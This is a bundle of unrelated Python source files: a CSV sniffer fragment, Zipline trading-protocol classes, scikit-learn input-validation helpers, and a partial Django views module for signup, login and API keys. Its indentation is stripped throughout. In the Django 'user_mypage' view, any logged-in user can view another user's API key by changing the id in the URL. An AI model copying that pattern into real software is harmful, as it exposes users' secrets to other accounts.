# if there's more than one, fall back to a 'preferred' list
if len(delims) > 1:
for d in self.preferred:
if d in delims.keys():
skipinitialspace = (data[0].count(d) ==
data[0].count("%c " % d))
return (d, skipinitialspace)
# nothing else indicates a preference, pick the character that
# dominates(?)
items = [(v,k) for (k,v) in delims.items()]
items.sort()
delim = items[-1][1]
skipinitialspace = (data[0].count(delim) ==
data[0].count("%c " % delim))
return (delim, skipinitialspace)
def has_header(self, sample):
# Creates a dictionary of types of data in each column. If any
# column is of a single type (say, integers), *except* for the first
# row, then the first row is presumed to be labels. If the type
# can't be determined, it is assumed to be a string in which case
# the length of the string is the determining factor: if all of the
# rows except for the first are the same length, it's a header.
# Finally, a 'vote' is taken at the end for each column, adding or
# subtracting from the likelihood of the first row being a header.
rdr = reader(StringIO(sample), self.sniff(sample))
header = next(rdr) # assume first row is header
columns = len(header)
columnTypes = {}
for i in range(columns): columnTypes[i] = None
checked = 0
for row in rdr:
# arbitrary number of rows to check, to keep it sane
if checked > 20:
break
checked += 1
if len(row) != columns:
continue # skip rows that have irregular number of columns
for col in list(columnTypes.keys()):
for thisType in [int, float, complex]:
try:
thisType(row[col])
break
except (ValueError, OverflowError):
pass
else:
# fallback to length of string
thisType = len(row[col])
if thisType != columnTypes[col]:
if columnTypes[col] is None: # add new column type
columnTypes[col] = thisType
else:
# type is inconsistent, remove column from
# consideration
del columnTypes[col]
# finally, compare results against first row and "vote"
# on whether it's a header
hasHeader = 0
for col, colType in columnTypes.items():
if type(colType) == type(0): # it's a length
if len(header[col]) != colType:
hasHeader += 1
else:
hasHeader -= 1
else: # attempt typecast
try:
colType(header[col])
except (ValueError, TypeError):
hasHeader += 1
else:
hasHeader -= 1
return hasHeader > 0
|
|
#
# Copyright 2013 Quantopian, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from six import iteritems, iterkeys
import pandas as pd
from . utils.protocol_utils import Enum
from zipline.finance.trading import with_environment
from zipline.utils.algo_instance import get_algo_instance
# Datasource type should completely determine the other fields of a
# message with its type.
DATASOURCE_TYPE = Enum(
'AS_TRADED_EQUITY',
'MERGER',
'SPLIT',
'DIVIDEND',
'TRADE',
'TRANSACTION',
'ORDER',
'EMPTY',
'DONE',
'CUSTOM',
'BENCHMARK',
'COMMISSION'
)
# Expected fields/index values for a dividend Series.
DIVIDEND_FIELDS = [
'declared_date',
'ex_date',
'gross_amount',
'net_amount',
'pay_date',
'payment_sid',
'ratio',
'sid',
]
# Expected fields/index values for a dividend payment Series.
DIVIDEND_PAYMENT_FIELDS = ['id', 'payment_sid', 'cash_amount', 'share_count']
def dividend_payment(data=None):
"""
Take a dictionary whose values are in DIVIDEND_PAYMENT_FIELDS and return a
series representing the payment of a dividend.
Ids are assigned to each historical dividend in
PerformanceTracker.update_dividends. They are guaranteed to be unique
integers with the context of a single simulation. If @data is non-empty, a
id is required to identify the historical dividend associated with this
payment.
Additionally, if @data is non-empty, either data['cash_amount'] should be
nonzero or data['payment_sid'] should be a security identifier and
data['share_count'] should be nonzero.
The returned Series is given its id value as a name so that concatenating
payments results in a DataFrame indexed by id. (Note, however, that the
name value is not used to construct an index when this series is returned
by function passed to `DataFrame.apply`. In such a case, pandas preserves
the index of the DataFrame on which `apply` is being called.)
"""
return pd.Series(
data=data,
name=data['id'] if data is not None else None,
index=DIVIDEND_PAYMENT_FIELDS,
dtype=object,
)
class Event(object):
def __init__(self, initial_values=None):
if initial_values:
self.__dict__ = initial_values
def __getitem__(self, name):
return getattr(self, name)
def __setitem__(self, name, value):
setattr(self, name, value)
def __delitem__(self, name):
delattr(self, name)
def keys(self):
return self.__dict__.keys()
def __eq__(self, other):
return hasattr(other, '__dict__') and self.__dict__ == other.__dict__
def __contains__(self, name):
return name in self.__dict__
def __repr__(self):
return "Event({0})".format(self.__dict__)
def to_series(self, index=None):
return pd.Series(self.__dict__, index=index)
class Order(Event):
pass
class Portfolio(object):
def __init__(self):
self.capital_used = 0.0
self.starting_cash = 0.0
self.portfolio_value = 0.0
self.pnl = 0.0
self.returns = 0.0
self.cash = 0.0
self.positions = Positions()
self.start_date = None
self.positions_value = 0.0
def __getitem__(self, key):
return self.__dict__[key]
def __repr__(self):
return "Portfolio({0})".format(self.__dict__)
class Account(object):
'''
The account object tracks information about the trading account. The
values are updated as the algorithm runs and its keys remain unchanged.
If connected to a broker, one can update these values with the trading
account values as reported by the broker.
'''
def __init__(self):
self.settled_cash = 0.0
self.accrued_interest = 0.0
self.buying_power = float('inf')
self.equity_with_loan = 0.0
self.total_positions_value = 0.0
self.regt_equity = 0.0
self.regt_margin = float('inf')
self.initial_margin_requirement = 0.0
self.maintenance_margin_requirement = 0.0
self.available_funds = 0.0
self.excess_liquidity = 0.0
self.cushion = 0.0
self.day_trades_remaining = float('inf')
self.leverage = 0.0
self.net_leverage = 0.0
self.net_liquidation = 0.0
def __getitem__(self, key):
return self.__dict__[key]
def __repr__(self):
return "Account({0})".format(self.__dict__)
def _get_state(self):
return 'Account', self.__dict__
def _set_state(self, saved_state):
self.__dict__.update(saved_state)
class Position(object):
def __init__(self, sid):
self.sid = sid
self.amount = 0
self.cost_basis = 0.0 # per share
self.last_sale_price = 0.0
def __getitem__(self, key):
return self.__dict__[key]
def __repr__(self):
return "Position({0})".format(self.__dict__)
class Positions(dict):
def __missing__(self, key):
pos = Position(key)
self[key] = pos
return pos
class SIDData(object):
# Cache some data on the class so that this is shared for all instances of
# siddata.
# The dt where we cached the history.
_history_cache_dt = None
# _history_cache is a a dict mapping fields to pd.DataFrames. This is the
# most data we have for a given field for the _history_cache_dt.
_history_cache = {}
# This is the cache that is used for returns. This will have a different
# structure than the other history cache as this is always daily.
_returns_cache_dt = None
_returns_cache = None
# The last dt that we needed to cache the number of minutes.
_minute_bar_cache_dt = None
# If we are in minute mode, there is some cost associated with computing
# the number of minutes that we need to pass to the bar count of history.
# This will remain constant for a given bar and day count.
# This maps days to number of minutes.
_minute_bar_cache = {}
def __init__(self, sid, initial_values=None):
self._sid = sid
self._freqstr = None
# To check if we have data, we use the __len__ which depends on the
# __dict__. Because we are foward defining the attributes needed, we
# need to account for their entrys in the __dict__.
# We will add 1 because we need to account for the _initial_len entry
# itself.
self._initial_len = len(self.__dict__) + 1
if initial_values:
self.__dict__.update(initial_values)
@property
def datetime(self):
"""
Provides an alias from data['foo'].datetime -> data['foo'].dt
`datetime` was previously provided by adding a seperate `datetime`
member of the SIDData object via a generator that wrapped the incoming
data feed and added the field to each equity event.
This alias is intended to be temporary, to provide backwards
compatibility with existing algorithms, but should be considered
deprecated, and may be removed in the future.
"""
return self.dt
def get(self, name, default=None):
return self.__dict__.get(name, default)
def __getitem__(self, name):
return self.__dict__[name]
def __setitem__(self, name, value):
self.__dict__[name] = value
def __len__(self):
return len(self.__dict__) - self._initial_len
def __contains__(self, name):
return name in self.__dict__
def __repr__(self):
return "SIDData({0})".format(self.__dict__)
def _get_buffer(self, bars, field='price'):
"""
Gets the result of history for the given number of bars and field.
This will cache the results internally.
"""
cls = self.__class__
algo = get_algo_instance()
now = algo.datetime
if now != cls._history_cache_dt:
# For a given dt, the history call for this field will not change.
# We have a new dt, so we should reset the cache.
cls._history_cache_dt = now
cls._history_cache = {}
if field not in self._history_cache \
or bars > len(cls._history_cache[field].index):
# If we have never cached this field OR the amount of bars that we
# need for this field is greater than the amount we have cached,
# then we need to get more history.
hst = algo.history(
bars, self._freqstr, field, ffill=True,
)
# Assert that the column holds ints, not security objects.
if not isinstance(self._sid, str):
hst.columns = hst.columns.astype(int)
self._history_cache[field] = hst
# Slice of only the bars needed. This is because we strore the LARGEST
# amount of history for the field, and we might request less than the
# largest from the cache.
return cls._history_cache[field][self._sid][-bars:]
def _get_bars(self, days):
"""
Gets the number of bars needed for the current number of days.
Figures this out based on the algo datafrequency and caches the result.
This caches the result by replacing this function on the object.
This means that after the first call to _get_bars, this method will
point to a new function object.
"""
def daily_get_bars(days):
return days
@with_environment()
def minute_get_bars(days, env=None):
cls = self.__class__
now = get_algo_instance().datetime
if now != cls._minute_bar_cache_dt:
cls._minute_bar_cache_dt = now
cls._minute_bar_cache = {}
if days not in cls._minute_bar_cache:
# Cache this calculation to happen once per bar, even if we
# use another transform with the same number of days.
prev = env.previous_trading_day(now)
ds = env.days_in_range(
env.add_trading_days(-days + 2, prev),
prev,
)
# compute the number of minutes in the (days - 1) days before
# today.
# 210 minutes in a an early close and 390 in a full day.
ms = sum(210 if d in env.early_closes else 390 for d in ds)
# Add the number of minutes for today.
ms += int(
(now - env.get_open_and_close(now)[0]).total_seconds() / 60
)
cls._minute_bar_cache[days] = ms + 1 # Account for this minute
return cls._minute_bar_cache[days]
if get_algo_instance().sim_params.data_frequency == 'daily':
self._freqstr = '1d'
# update this method to point to the daily variant.
self._get_bars = daily_get_bars
else:
self._freqstr = '1m'
# update this method to point to the minute variant.
self._get_bars = minute_get_bars
# Not actually recursive because we have already cached the new method.
return self._get_bars(days)
def mavg(self, days):
return self._get_buffer(self._get_bars(days)).mean()
def stddev(self, days):
return self._get_buffer(self._get_bars(days)).std(ddof=1)
def vwap(self, days):
bars = self._get_bars(days)
prices = self._get_buffer(bars)
vols = self._get_buffer(bars, field='volume')
return (prices * vols).sum() / vols.sum()
def returns(self):
algo = get_algo_instance()
now = algo.datetime
if now != self._returns_cache_dt:
self._returns_cache_dt = now
self._returns_cache = algo.history(2, '1d', 'price', ffill=True)
hst = self._returns_cache[self._sid]
return (hst.iloc[-1] - hst.iloc[0]) / hst.iloc[0]
class BarData(object):
"""
Holds the event data for all sids for a given dt.
This is what is passed as `data` to the `handle_data` function.
Note: Many methods are analogues of dictionary because of historical
usage of what this replaced as a dictionary subclass.
"""
def __init__(self, data=None):
self._data = data or {}
self._contains_override = None
def __contains__(self, name):
if self._contains_override:
if self._contains_override(name):
return name in self._data
else:
return False
else:
return name in self._data
def has_key(self, name):
"""
DEPRECATED: __contains__ is preferred, but this method is for
compatibility with existing algorithms.
"""
return name in self
def __setitem__(self, name, value):
self._data[name] = value
def __getitem__(self, name):
return self._data[name]
def __delitem__(self, name):
del self._data[name]
def __iter__(self):
for sid, data in iteritems(self._data):
# Allow contains override to filter out sids.
if sid in self:
if len(data):
yield sid
def iterkeys(self):
# Allow contains override to filter out sids.
return (sid for sid in iterkeys(self._data) if sid in self)
def keys(self):
# Allow contains override to filter out sids.
return list(self.iterkeys())
def itervalues(self):
return (value for _sid, value in self.iteritems())
def values(self):
return list(self.itervalues())
def iteritems(self):
return ((sid, value) for sid, value
in iteritems(self._data)
if sid in self)
def items(self):
return list(self.iteritems())
def __len__(self):
return len(self.keys())
def __repr__(self):
return '{0}({1})'.format(self.__class__.__name__, self._data)
|
|
"""Utilities for input validation"""
# Authors: Olivier Grisel
# Gael Varoquaux
# Andreas Mueller
# Lars Buitinck
# Alexandre Gramfort
# Nicolas Tresegnie
# License: BSD 3 clause
import warnings
import numbers
import numpy as np
import scipy.sparse as sp
from ..externals import six
from inspect import getargspec
FLOAT_DTYPES = (np.float64, np.float32, np.float16)
class DataConversionWarning(UserWarning):
"""A warning on implicit data conversions happening in the code"""
pass
warnings.simplefilter("always", DataConversionWarning)
class NonBLASDotWarning(UserWarning):
"""A warning on implicit dispatch to numpy.dot"""
class NotFittedError(ValueError, AttributeError):
"""Exception class to raise if estimator is used before fitting
This class inherits from both ValueError and AttributeError to help with
exception handling and backward compatibility.
"""
# Silenced by default to reduce verbosity. Turn on at runtime for
# performance profiling.
warnings.simplefilter('ignore', NonBLASDotWarning)
def _assert_all_finite(X):
"""Like assert_all_finite, but only for ndarray."""
X = np.asanyarray(X)
# First try an O(n) time, O(1) space solution for the common case that
# everything is finite; fall back to O(n) space np.isfinite to prevent
# false positives from overflow in sum method.
if (X.dtype.char in np.typecodes['AllFloat'] and not np.isfinite(X.sum())
and not np.isfinite(X).all()):
raise ValueError("Input contains NaN, infinity"
" or a value too large for %r." % X.dtype)
def assert_all_finite(X):
"""Throw a ValueError if X contains NaN or infinity.
Input MUST be an np.ndarray instance or a scipy.sparse matrix."""
_assert_all_finite(X.data if sp.issparse(X) else X)
def as_float_array(X, copy=True, force_all_finite=True):
"""Converts an array-like to an array of floats
The new dtype will be np.float32 or np.float64, depending on the original
type. The function can create a copy or modify the argument depending
on the argument copy.
Parameters
----------
X : {array-like, sparse matrix}
copy : bool, optional
If True, a copy of X will be created. If False, a copy may still be
returned if X's dtype is not a floating point type.
force_all_finite : boolean (default=True)
Whether to raise an error on np.inf and np.nan in X.
Returns
-------
XT : {array, sparse matrix}
An array of type np.float
"""
if isinstance(X, np.matrix) or (not isinstance(X, np.ndarray)
and not sp.issparse(X)):
return check_array(X, ['csr', 'csc', 'coo'], dtype=np.float64,
copy=copy, force_all_finite=force_all_finite,
ensure_2d=False)
elif sp.issparse(X) and X.dtype in [np.float32, np.float64]:
return X.copy() if copy else X
elif X.dtype in [np.float32, np.float64]: # is numpy array
return X.copy('F' if X.flags['F_CONTIGUOUS'] else 'C') if copy else X
else:
return X.astype(np.float32 if X.dtype == np.int32 else np.float64)
def _is_arraylike(x):
"""Returns whether the input is array-like"""
return (hasattr(x, '__len__') or
hasattr(x, 'shape') or
hasattr(x, '__array__'))
def _num_samples(x):
"""Return number of samples in array-like x."""
if hasattr(x, 'fit'):
# Don't get num_samples from an ensembles length!
raise TypeError('Expected sequence or array-like, got '
'estimator %s' % x)
if not hasattr(x, '__len__') and not hasattr(x, 'shape'):
if hasattr(x, '__array__'):
x = np.asarray(x)
else:
raise TypeError("Expected sequence or array-like, got %s" %
type(x))
if hasattr(x, 'shape'):
if len(x.shape) == 0:
raise TypeError("Singleton array %r cannot be considered"
" a valid collection." % x)
return x.shape[0]
else:
return len(x)
def _shape_repr(shape):
"""Return a platform independent reprensentation of an array shape
Under Python 2, the `long` type introduces an 'L' suffix when using the
default %r format for tuples of integers (typically used to store the shape
of an array).
Under Windows 64 bit (and Python 2), the `long` type is used by default
in numpy shapes even when the integer dimensions are well below 32 bit.
The platform specific type causes string messages or doctests to change
from one platform to another which is not desirable.
Under Python 3, there is no more `long` type so the `L` suffix is never
introduced in string representation.
>>> _shape_repr((1, 2))
'(1, 2)'
>>> one = 2 ** 64 / 2 ** 64 # force an upcast to `long` under Python 2
>>> _shape_repr((one, 2 * one))
'(1, 2)'
>>> _shape_repr((1,))
'(1,)'
>>> _shape_repr(())
'()'
"""
if len(shape) == 0:
return "()"
joined = ", ".join("%d" % e for e in shape)
if len(shape) == 1:
# special notation for singleton tuples
joined += ','
return "(%s)" % joined
def check_consistent_length(*arrays):
"""Check that all arrays have consistent first dimensions.
Checks whether all objects in arrays have the same shape or length.
Parameters
----------
*arrays : list or tuple of input objects.
Objects that will be checked for consistent length.
"""
uniques = np.unique([_num_samples(X) for X in arrays if X is not None])
if len(uniques) > 1:
raise ValueError("Found arrays with inconsistent numbers of samples: "
"%s" % str(uniques))
def indexable(*iterables):
"""Make arrays indexable for cross-validation.
Checks consistent length, passes through None, and ensures that everything
can be indexed by converting sparse matrices to csr and converting
non-interable objects to arrays.
Parameters
----------
*iterables : lists, dataframes, arrays, sparse matrices
List of objects to ensure sliceability.
"""
result = []
for X in iterables:
if sp.issparse(X):
result.append(X.tocsr())
elif hasattr(X, "__getitem__") or hasattr(X, "iloc"):
result.append(X)
elif X is None:
result.append(X)
else:
result.append(np.array(X))
check_consistent_length(*result)
return result
def _ensure_sparse_format(spmatrix, accept_sparse, dtype, copy,
force_all_finite):
"""Convert a sparse matrix to a given format.
Checks the sparse format of spmatrix and converts if necessary.
Parameters
----------
spmatrix : scipy sparse matrix
Input to validate and convert.
accept_sparse : string, list of string or None (default=None)
String[s] representing allowed sparse matrix formats ('csc',
'csr', 'coo', 'dok', 'bsr', 'lil', 'dia'). None means that sparse
matrix input will raise an error. If the input is sparse but not in
the allowed format, it will be converted to the first listed format.
dtype : string, type or None (default=none)
Data type of result. If None, the dtype of the input is preserved.
copy : boolean (default=False)
Whether a forced copy will be triggered. If copy=False, a copy might
be triggered by a conversion.
force_all_finite : boolean (default=True)
Whether to raise an error on np.inf and np.nan in X.
Returns
-------
spmatrix_converted : scipy sparse matrix.
Matrix that is ensured to have an allowed type.
"""
if accept_sparse in [None, False]:
raise TypeError('A sparse matrix was passed, but dense '
'data is required. Use X.toarray() to '
'convert to a dense numpy array.')
if dtype is None:
dtype = spmatrix.dtype
changed_format = False
if (isinstance(accept_sparse, (list, tuple))
and spmatrix.format not in accept_sparse):
# create new with correct sparse
spmatrix = spmatrix.asformat(accept_sparse[0])
changed_format = True
if dtype != spmatrix.dtype:
# convert dtype
spmatrix = spmatrix.astype(dtype)
elif copy and not changed_format:
# force copy
spmatrix = spmatrix.copy()
if force_all_finite:
if not hasattr(spmatrix, "data"):
warnings.warn("Can't check %s sparse matrix for nan or inf."
% spmatrix.format)
else:
_assert_all_finite(spmatrix.data)
return spmatrix
def check_array(array, accept_sparse=None, dtype="numeric", order=None,
copy=False, force_all_finite=True, ensure_2d=True,
allow_nd=False, ensure_min_samples=1, ensure_min_features=1,
warn_on_dtype=False, estimator=None):
"""Input validation on an array, list, sparse matrix or similar.
By default, the input is converted to an at least 2nd numpy array.
If the dtype of the array is object, attempt converting to float,
raising on failure.
Parameters
----------
array : object
Input object to check / convert.
accept_sparse : string, list of string or None (default=None)
String[s] representing allowed sparse matrix formats, such as 'csc',
'csr', etc. None means that sparse matrix input will raise an error.
If the input is sparse but not in the allowed format, it will be
converted to the first listed format.
dtype : string, type, list of types or None (default="numeric")
Data type of result. If None, the dtype of the input is preserved.
If "numeric", dtype is preserved unless array.dtype is object.
If dtype is a list of types, conversion on the first type is only
performed if the dtype of the input is not in the list.
order : 'F', 'C' or None (default=None)
Whether an array will be forced to be fortran or c-style.
copy : boolean (default=False)
Whether a forced copy will be triggered. If copy=False, a copy might
be triggered by a conversion.
force_all_finite : boolean (default=True)
Whether to raise an error on np.inf and np.nan in X.
ensure_2d : boolean (default=True)
Whether to make X at least 2d.
allow_nd : boolean (default=False)
Whether to allow X.ndim > 2.
ensure_min_samples : int (default=1)
Make sure that the array has a minimum number of samples in its first
axis (rows for a 2D array). Setting to 0 disables this check.
ensure_min_features : int (default=1)
Make sure that the 2D array has some minimum number of features
(columns). The default value of 1 rejects empty datasets.
This check is only enforced when the input data has effectively 2
dimensions or is originally 1D and ``ensure_2d`` is True. Setting to 0
disables this check.
warn_on_dtype : boolean (default=False)
Raise DataConversionWarning if the dtype of the input data structure
does not match the requested dtype, causing a memory copy.
estimator : str or estimator instance (default=None)
If passed, include the name of the estimator in warning messages.
Returns
-------
X_converted : object
The converted and validated X.
"""
if isinstance(accept_sparse, str):
accept_sparse = [accept_sparse]
# store whether originally we wanted numeric dtype
dtype_numeric = dtype == "numeric"
dtype_orig = getattr(array, "dtype", None)
if not hasattr(dtype_orig, 'kind'):
# not a data type (e.g. a column named dtype in a pandas DataFrame)
dtype_orig = None
if dtype_numeric:
if dtype_orig is not None and dtype_orig.kind == "O":
# if input is object, convert to float.
dtype = np.float64
else:
dtype = None
if isinstance(dtype, (list, tuple)):
if dtype_orig is not None and dtype_orig in dtype:
# no dtype conversion required
dtype = None
else:
# dtype conversion required. Let's select the first element of the
# list of accepted types.
dtype = dtype[0]
if sp.issparse(array):
array = _ensure_sparse_format(array, accept_sparse, dtype, copy,
force_all_finite)
else:
array = np.array(array, dtype=dtype, order=order, copy=copy)
if ensure_2d:
if array.ndim == 1:
warnings.warn("Passing 1d arrays as data is deprecated and "
"will be removed in 0.18. Reshape your data either using"
"X.reshape(-1, 1) if your data has a single feature or"
"X.reshape(1, -1) if it contains a single sample.",
DeprecationWarning)
array = np.atleast_2d(array)
# To ensure that array flags are maintained
array = np.array(array, dtype=dtype, order=order, copy=copy)
# make sure we acually converted to numeric:
if dtype_numeric and array.dtype.kind == "O":
array = array.astype(np.float64)
if not allow_nd and array.ndim >= 3:
raise ValueError("Found array with dim %d. Expected <= 2" %
array.ndim)
if force_all_finite:
_assert_all_finite(array)
shape_repr = _shape_repr(array.shape)
if ensure_min_samples > 0:
n_samples = _num_samples(array)
if n_samples < ensure_min_samples:
raise ValueError("Found array with %d sample(s) (shape=%s) while a"
" minimum of %d is required."
% (n_samples, shape_repr, ensure_min_samples))
if ensure_min_features > 0 and array.ndim == 2:
n_features = array.shape[1]
if n_features < ensure_min_features:
raise ValueError("Found array with %d feature(s) (shape=%s) while"
" a minimum of %d is required."
% (n_features, shape_repr, ensure_min_features))
if warn_on_dtype and dtype_orig is not None and array.dtype != dtype_orig:
msg = ("Data with input dtype %s was converted to %s"
% (dtype_orig, array.dtype))
if estimator is not None:
if not isinstance(estimator, six.string_types):
estimator = estimator.__class__.__name__
msg += " by %s" % estimator
warnings.warn(msg, DataConversionWarning)
return array
def check_X_y(X, y, accept_sparse=None, dtype="numeric", order=None, copy=False,
force_all_finite=True, ensure_2d=True, allow_nd=False,
multi_output=False, ensure_min_samples=1,
ensure_min_features=1, y_numeric=False,
warn_on_dtype=False, estimator=None):
"""Input validation for standard estimators.
Checks X and y for consistent length, enforces X 2d and y 1d.
Standard input checks are only applied to y. For multi-label y,
set multi_output=True to allow 2d and sparse y.
If the dtype of X is object, attempt converting to float,
raising on failure.
Parameters
----------
X : nd-array, list or sparse matrix
Input data.
y : nd-array, list or sparse matrix
Labels.
accept_sparse : string, list of string or None (default=None)
String[s] representing allowed sparse matrix formats, such as 'csc',
'csr', etc. None means that sparse matrix input will raise an error.
If the input is sparse but not in the allowed format, it will be
converted to the first listed format.
dtype : string, type, list of types or None (default="numeric")
Data type of result. If None, the dtype of the input is preserved.
If "numeric", dtype is preserved unless array.dtype is object.
If dtype is a list of types, conversion on the first type is only
performed if the dtype of the input is not in the list.
order : 'F', 'C' or None (default=None)
Whether an array will be forced to be fortran or c-style.
copy : boolean (default=False)
Whether a forced copy will be triggered. If copy=False, a copy might
be triggered by a conversion.
force_all_finite : boolean (default=True)
Whether to raise an error on np.inf and np.nan in X.
ensure_2d : boolean (default=True)
Whether to make X at least 2d.
allow_nd : boolean (default=False)
Whether to allow X.ndim > 2.
multi_output : boolean (default=False)
Whether to allow 2-d y (array or sparse matrix). If false, y will be
validated as a vector.
ensure_min_samples : int (default=1)
Make sure that X has a minimum number of samples in its first
axis (rows for a 2D array).
ensure_min_features : int (default=1)
Make sure that the 2D array has some minimum number of features
(columns). The default value of 1 rejects empty datasets.
This check is only enforced when X has effectively 2 dimensions or
is originally 1D and ``ensure_2d`` is True. Setting to 0 disables
this check.
y_numeric : boolean (default=False)
Whether to ensure that y has a numeric type. If dtype of y is object,
it is converted to float64. Should only be used for regression
algorithms.
warn_on_dtype : boolean (default=False)
Raise DataConversionWarning if the dtype of the input data structure
does not match the requested dtype, causing a memory copy.
estimator : str or estimator instance (default=None)
If passed, include the name of the estimator in warning messages.
Returns
-------
X_converted : object
The converted and validated X.
"""
X = check_array(X, accept_sparse, dtype, order, copy, force_all_finite,
ensure_2d, allow_nd, ensure_min_samples,
ensure_min_features, warn_on_dtype, estimator)
if multi_output:
y = check_array(y, 'csr', force_all_finite=True, ensure_2d=False,
dtype=None)
else:
y = column_or_1d(y, warn=True)
_assert_all_finite(y)
if y_numeric and y.dtype.kind == 'O':
y = y.astype(np.float64)
check_consistent_length(X, y)
return X, y
def column_or_1d(y, warn=False):
""" Ravel column or 1d numpy array, else raises an error
Parameters
----------
y : array-like
warn : boolean, default False
To control display of warnings.
Returns
-------
y : array
"""
shape = np.shape(y)
if len(shape) == 1:
return np.ravel(y)
if len(shape) == 2 and shape[1] == 1:
if warn:
warnings.warn("A column-vector y was passed when a 1d array was"
" expected. Please change the shape of y to "
"(n_samples, ), for example using ravel().",
DataConversionWarning, stacklevel=2)
return np.ravel(y)
raise ValueError("bad input shape {0}".format(shape))
def check_random_state(seed):
"""Turn seed into a np.random.RandomState instance
If seed is None, return the RandomState singleton used by np.random.
If seed is an int, return a new RandomState instance seeded with seed.
If seed is already a RandomState instance, return it.
Otherwise raise ValueError.
"""
if seed is None or seed is np.random:
return np.random.mtrand._rand
if isinstance(seed, (numbers.Integral, np.integer)):
return np.random.RandomState(seed)
if isinstance(seed, np.random.RandomState):
return seed
raise ValueError('%r cannot be used to seed a numpy.random.RandomState'
' instance' % seed)
def has_fit_parameter(estimator, parameter):
"""Checks whether the estimator's fit method supports the given parameter.
Examples
--------
>>> from sklearn.svm import SVC
>>> has_fit_parameter(SVC(), "sample_weight")
True
"""
return parameter in getargspec(estimator.fit)[0]
def check_symmetric(array, tol=1E-10, raise_warning=True,
raise_exception=False):
"""Make sure that array is 2D, square and symmetric.
If the array is not symmetric, then a symmetrized version is returned.
Optionally, a warning or exception is raised if the matrix is not
symmetric.
Parameters
----------
array : nd-array or sparse matrix
Input object to check / convert. Must be two-dimensional and square,
otherwise a ValueError will be raised.
tol : float
Absolute tolerance for equivalence of arrays. Default = 1E-10.
raise_warning : boolean (default=True)
If True then raise a warning if conversion is required.
raise_exception : boolean (default=False)
If True then raise an exception if array is not symmetric.
Returns
-------
array_sym : ndarray or sparse matrix
Symmetrized version of the input array, i.e. the average of array
and array.transpose(). If sparse, then duplicate entries are first
summed and zeros are eliminated.
"""
if (array.ndim != 2) or (array.shape[0] != array.shape[1]):
raise ValueError("array must be 2-dimensional and square. "
"shape = {0}".format(array.shape))
if sp.issparse(array):
diff = array - array.T
# only csr, csc, and coo have `data` attribute
if diff.format not in ['csr', 'csc', 'coo']:
diff = diff.tocsr()
symmetric = np.all(abs(diff.data) < tol)
else:
symmetric = np.allclose(array, array.T, atol=tol)
if not symmetric:
if raise_exception:
raise ValueError("Array must be symmetric")
if raise_warning:
warnings.warn("Array is not symmetric, and will be converted "
"to symmetric by average with its transpose.")
if sp.issparse(array):
conversion = 'to' + array.format
array = getattr(0.5 * (array + array.T), conversion)()
else:
array = 0.5 * (array + array.T)
return array
def check_is_fitted(estimator, attributes, msg=None, all_or_any=all):
"""Perform is_fitted validation for estimator.
Checks if the estimator is fitted by verifying the presence of
"all_or_any" of the passed attributes and raises a NotFittedError with the
given message.
Parameters
----------
estimator : estimator instance.
estimator instance for which the check is performed.
attributes : attribute name(s) given as string or a list/tuple of strings
Eg. : ["coef_", "estimator_", ...], "coef_"
msg : string
The default error message is, "This %(name)s instance is not fitted
yet. Call 'fit' with appropriate arguments before using this method."
For custom messages if "%(name)s" is present in the message string,
it is substituted for the estimator name.
Eg. : "Estimator, %(name)s, must be fitted before sparsifying".
all_or_any : callable, {all, any}, default all
Specify whether all or any of the given attributes must exist.
"""
if msg is None:
msg = ("This %(name)s instance is not fitted yet. Call 'fit' with "
"appropriate arguments before using this method.")
if not hasattr(estimator, 'fit'):
raise TypeError("%s is not an estimator instance." % (estimator))
if not isinstance(attributes, (list, tuple)):
attributes = [attributes]
if not all_or_any([hasattr(estimator, attr) for attr in attributes]):
raise NotFittedError(msg % {'name': type(estimator).__name__})
def check_non_negative(X, whom):
"""
Check if there is any negative value in an array.
Parameters
----------
X : array-like or sparse matrix
Input data.
whom : string
Who passed X to this function.
"""
X = X.data if sp.issparse(X) else X
if (X < 0).any():
raise ValueError("Negative values in data passed to %s" % whom)
|
|
import datetime
from django.core.exceptions import ObjectDoesNotExist
from django.db import IntegrityError
from django.contrib.auth.decorators import login_required
from django.contrib.auth import authenticate, login, logout
from django.contrib import messages
from django.http import HttpResponse, JsonResponse
from django.shortcuts import render, redirect, get_object_or_404
from django.views.decorators.cache import cache_page, cache_control, never_cache
from django.views.decorators.csrf import csrf_exempt
from main.forms import UserCreationForm
from main.models import User, ApiKey, Domain
from urllib.parse import urlparse
import json
import jwt
def index(request):
context = {
}
return render(request, 'main/pages/index.html', context)
def user_signup(request):
context = {
}
if request.is_ajax():
response_data = {}
data = json.loads(request.body.decode('utf-8'))
postEmail = data.get('email')
postUsername = data.get('username')
postPassword = data.get('password')
user = User(email=postEmail, username=postUsername)
user.set_password(postPassword)
try:
user.save()
except IntegrityError as e:
response_data['status'] = False
response_data['msg'] = 'Sorry! This email is already signed up.'
return HttpResponse(json.dumps(response_data),
content_type="application/json"
)
response_data['status'] = True
response_data['msg'] = 'Success!'
return HttpResponse(
json.dumps(response_data),
content_type="application/json"
)
else:
if request.method == 'POST':
form = UserCreationForm(request.POST)
if form.is_valid():
form.save()
else:
form = UserCreationForm()
context.update({'form': form})
return render(request, 'main/pages/signup.html', context)
def user_login(request):
context = {}
response_data = {}
if request.is_ajax():
response_data = {}
data = json.loads(request.body.decode('utf-8'))
postEmail = data.get('email')
postPassword = data.get('password')
try:
user = authenticate(email=postEmail, password=postPassword)
except:
response_data.update({'error': 'no user'})
return JsonResponse(response_data)
if user is not None:
if user.is_active:
login(request, user)
response_data.update({'status': 'success'})
return JsonResponse(response_data)
return JsonResponse({})
def user_logout(request):
logout(request)
return redirect('main:index')
@never_cache
@login_required
def user_mypage(request, id):
context = {
'userId': id
}
u = User.objects.get(id=id)
try:
a = ApiKey.objects.get(user=u)
d = Domain.objects.filter(api_key=a, is_removed=False)
except ObjectDoesNotExist:
a = None
d = None
context.update({
'api_key': a,
'domains': d
})
return render(request, 'main/pages/mypage.html', context)
@login_required
def apikey_new(request):
context = {}
if request.method == 'POST':
ApiKey.objects.generate(request.user)
return redirect('main:user_mypage', request.user.id)
@login_required
def domain_new(request):
context = {}
if request.method == 'POST':
domain = request.POST.get('domain')
parsed_domain = urlparse(domain)
